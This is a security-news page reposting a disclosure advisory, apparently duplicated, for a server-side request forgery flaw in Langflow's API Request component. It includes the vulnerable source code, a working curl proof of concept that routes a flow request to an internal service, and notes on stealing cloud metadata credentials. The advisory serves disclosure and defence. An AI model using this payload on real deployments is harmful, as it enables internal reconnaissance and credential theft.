Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-5993-7p27-66g5: Langflow vulnerable to Server-Side Request Forgery

Vulnerability Overview

Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.

Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.

Vulnerable Code

  1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L349-L359

    @router.post("/run/{flow_id_or_name}", response_model=None, response_model_exclude_none=True)
    async def simplified_run_flow(
        *,
        background_tasks: BackgroundTasks,
        flow: Annotated[FlowRead | None, Depends(get_flow_by_id_or_endpoint_name)],
        input_request: SimplifiedAPIRequest | None = None,
        stream: bool = False,
        api_key_user: Annotated[UserRead, Depends(api_key_security)],
        context: dict | None = None,
        http_request: Request,
    ):
    

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L573-L588

    @router.post(
        "/run/advanced/{flow_id_or_name}",
        response_model=RunResponse,
        response_model_exclude_none=True,
    )
    async def experimental_run_flow(
        *,
        session: DbSession,
        flow: Annotated[Flow, Depends(get_flow_by_id_or_endpoint_name)],
        inputs: list[InputValueRequest] | None = None,
        outputs: list[str] | None = None,
        tweaks: Annotated[Tweaks | None, Body(embed=True)] = None,
        stream: Annotated[bool, Body(embed=True)] = False,
        session_id: Annotated[None | str, Body(embed=True)] = None,
        api_key_user: Annotated[UserRead, Depends(api_key_security)],
    ) -> RunResponse:
    
  2. Normalization/validation stage: It only checks that the URL is non-empty and well-formed. No blocking of private networks, localhost, or IMDS.

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L280-L289

        def _normalize_url(self, url: str) -> str:
            """Normalize URL by adding https:// if no protocol is specified."""
            if not url or not isinstance(url, str):
                msg = "URL cannot be empty"
                raise ValueError(msg)
    
            url = url.strip()
            if url.startswith(("http://", "https://")):
                return url
            return f"https://{url}"
    

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L433-L438

            url = self._normalize_url(url)
    
            # Validate URL
            if not validators.url(url):
                msg = f"Invalid URL provided: {url}"
                raise ValueError(msg)
    
  3. On the server side, it sends a request to an arbitrary URL using httpx.AsyncClient and exposes the response body as metadata[“result”].

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L312-L322

            try:
                # Prepare request parameters
                request_params = {
                    "method": method,
                    "url": url,
                    "headers": headers,
                    "json": processed_body,
                    "timeout": timeout,
                    "follow_redirects": follow_redirects,
                }
                response = await client.request(**request_params)
    

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L335-L340

                # Base metadata
                metadata = {
                    "source": url,
                    "status_code": response.status_code,
                    "response_headers": response_headers,
                }
    

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L364-L379

                # Handle response content
                if is_binary:
                    result = response.content
                else:
                    try:
                        result = response.json()
                    except json.JSONDecodeError:
                        self.log("Failed to decode JSON response")
                        result = response.text.encode("utf-8")
    
                metadata["result"] = result
    
                if include_httpx_metadata:
                    metadata.update({"headers": headers})
    
                return Data(data=metadata)
    

PoC


PoC Description

  • I launched a Langflow server using the latest langflowai/langflow:latest Docker container, and a separate container internal-api that exposes an internal-only endpoint /internal on port 8000. Both containers were attached to the same user-defined network (ssrf-net), allowing communication by name or via the IP 172.18.0.3.
  • I added an API Request node to a Langflow flow and set the URL to the internal service (http://172.18.0.3:8000/internal). Then I invoked /api/v1/run/advanced/<FLOW_ID> with an API key to perform SSRF. The response returned the internal service’s body in the result field, confirming non-blind SSRF.

PoC

  • Langflow Setting

    <img width="1917" height="940" alt="image" src="https://github.com/user-attachments/assets/96b0d770-b260-440f-9205-1583c108e12f" />

  • Exploit

    curl -s -X POST 'http://localhost:7860/api/v1/run/advanced/0b7f7713-d88c-4f92-bcf8-0dafe250ea9d' \
      -H 'Content-Type: application/json' \
      -H 'x-api-key: sk-HHc93OjH_4ep_EhfWrweP1IwpooJ3ZZnYOu-HgqJV4M' \
      --data-raw '{
        "inputs":[{"components":[],"input_value":""}],
        "outputs":["Chat Output"],
        "tweaks":{"API Request":{"url_input":"http://172.18.0.3:8000/internal","include_httpx_metadata":false}},
        "stream":false
      }' | jq -r '.outputs[0].outputs[0].results.message.text | sub("^```json\\n";"") | sub("\\n```$";"") | fromjson | .result'
    

    <img width="1918" height="1029" alt="image" src="https://github.com/user-attachments/assets/4883029f-bd56-4c23-b5a3-6f8a84dbcce1" />

Impact


  • Scanning internal assets and data exfiltration: Attackers can access internal administrative HTTP endpoints, proxies, metrics dashboards, and management consoles to obtain sensitive information (versions, tokens, configurations).
  • Access to metadata services: In cloud environments, attackers can use 169.254.169.254, etc., to steal instance metadata and credentials.
  • Foothold for attacking internal services: Can forge requests by abusing inter-service trust and become the starting point of an SSRF→RCE chain (e.g., invoking an internal admin API).
  • Non-blind: Because the response body is returned to the client, attackers can immediately view and exploit the collected data.
  • Risk in multi-tenant environments: Bypassing tenant boundaries can cause cross-leakage of internal network information, resulting in high impact. Even in single-tenant setups, the risk remains high depending on internal network policies.
ghsa
#vulnerability#js#git#ssrf#docker

Vulnerability Overview

Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.

Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.

Vulnerable Code

  1. When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L349-L359

    @router.post("/run/{flow_id_or_name}", response_model=None, response_model_exclude_none=True) async def simplified_run_flow( *, background_tasks: BackgroundTasks, flow: Annotated[FlowRead | None, Depends(get_flow_by_id_or_endpoint_name)], input_request: SimplifiedAPIRequest | None = None, stream: bool = False, api_key_user: Annotated[UserRead, Depends(api_key_security)], context: dict | None = None, http_request: Request, ):

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L573-L588

    @router.post( "/run/advanced/{flow_id_or_name}", response_model=RunResponse, response_model_exclude_none=True, ) async def experimental_run_flow( *, session: DbSession, flow: Annotated[Flow, Depends(get_flow_by_id_or_endpoint_name)], inputs: list[InputValueRequest] | None = None, outputs: list[str] | None = None, tweaks: Annotated[Tweaks | None, Body(embed=True)] = None, stream: Annotated[bool, Body(embed=True)] = False, session_id: Annotated[None | str, Body(embed=True)] = None, api_key_user: Annotated[UserRead, Depends(api_key_security)], ) -> RunResponse:

  2. Normalization/validation stage: It only checks that the URL is non-empty and well-formed. No blocking of private networks, localhost, or IMDS.

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L280-L289

    def \_normalize\_url(self, url: str) \-> str:
        """Normalize URL by adding https:// if no protocol is specified."""
        if not url or not isinstance(url, str):
            msg \= "URL cannot be empty"
            raise ValueError(msg)
    
        url \= url.strip()
        if url.startswith(("http://", "https://")):
            return url
        return f"https://{url}"
    

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L433-L438

        url \= self.\_normalize\_url(url)
    
        \# Validate URL
        if not validators.url(url):
            msg \= f"Invalid URL provided: {url}"
            raise ValueError(msg)
    
  3. On the server side, it sends a request to an arbitrary URL using httpx.AsyncClient and exposes the response body as metadata[“result”].

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L312-L322

        try:
            \# Prepare request parameters
            request\_params \= {
                "method": method,
                "url": url,
                "headers": headers,
                "json": processed\_body,
                "timeout": timeout,
                "follow\_redirects": follow\_redirects,
            }
            response \= await client.request(\*\*request\_params)
    

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L335-L340

            \# Base metadata
            metadata \= {
                "source": url,
                "status\_code": response.status\_code,
                "response\_headers": response\_headers,
            }
    

    https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L364-L379

            \# Handle response content
            if is\_binary:
                result \= response.content
            else:
                try:
                    result \= response.json()
                except json.JSONDecodeError:
                    self.log("Failed to decode JSON response")
                    result \= response.text.encode("utf-8")
    
            metadata\["result"\] \= result
    
            if include\_httpx\_metadata:
                metadata.update({"headers": headers})
    
            return Data(data\=metadata)
    

PoC

PoC Description

  • I launched a Langflow server using the latest langflowai/langflow:latest Docker container, and a separate container internal-api that exposes an internal-only endpoint /internal on port 8000. Both containers were attached to the same user-defined network (ssrf-net), allowing communication by name or via the IP 172.18.0.3.
  • I added an API Request node to a Langflow flow and set the URL to the internal service (http://172.18.0.3:8000/internal). Then I invoked /api/v1/run/advanced/<FLOW_ID> with an API key to perform SSRF. The response returned the internal service’s body in the result field, confirming non-blind SSRF.

PoC

  • Langflow Setting

  • Exploit

    curl -s -X POST ‘http://localhost:7860/api/v1/run/advanced/0b7f7713-d88c-4f92-bcf8-0dafe250ea9d’ \ -H ‘Content-Type: application/json’ \ -H ‘x-api-key: sk-HHc93OjH_4ep_EhfWrweP1IwpooJ3ZZnYOu-HgqJV4M’ \ –data-raw ‘{ "inputs":[{"components":[],"input_value":""}], "outputs":[“Chat Output”], "tweaks":{"API Request":{"url_input":"http://172.18.0.3:8000/internal","include_httpx_metadata":false}}, "stream":false }’ | jq -r ‘.outputs[0].outputs[0].results.message.text | sub(“^```json\\n";"”) | sub(“\\n```$";"”) | fromjson | .result’

Impact

  • Scanning internal assets and data exfiltration: Attackers can access internal administrative HTTP endpoints, proxies, metrics dashboards, and management consoles to obtain sensitive information (versions, tokens, configurations).
  • Access to metadata services: In cloud environments, attackers can use 169.254.169.254, etc., to steal instance metadata and credentials.
  • Foothold for attacking internal services: Can forge requests by abusing inter-service trust and become the starting point of an SSRF→RCE chain (e.g., invoking an internal admin API).
  • Non-blind: Because the response body is returned to the client, attackers can immediately view and exploit the collected data.
  • Risk in multi-tenant environments: Bypassing tenant boundaries can cause cross-leakage of internal network information, resulting in high impact. Even in single-tenant setups, the risk remains high depending on internal network policies.

References

  • GHSA-5993-7p27-66g5
  • https://nvd.nist.gov/vuln/detail/CVE-2025-68477

ghsa: Latest News

GHSA-f43r-cc68-gpx4: External Control of File Name or Path in Langflow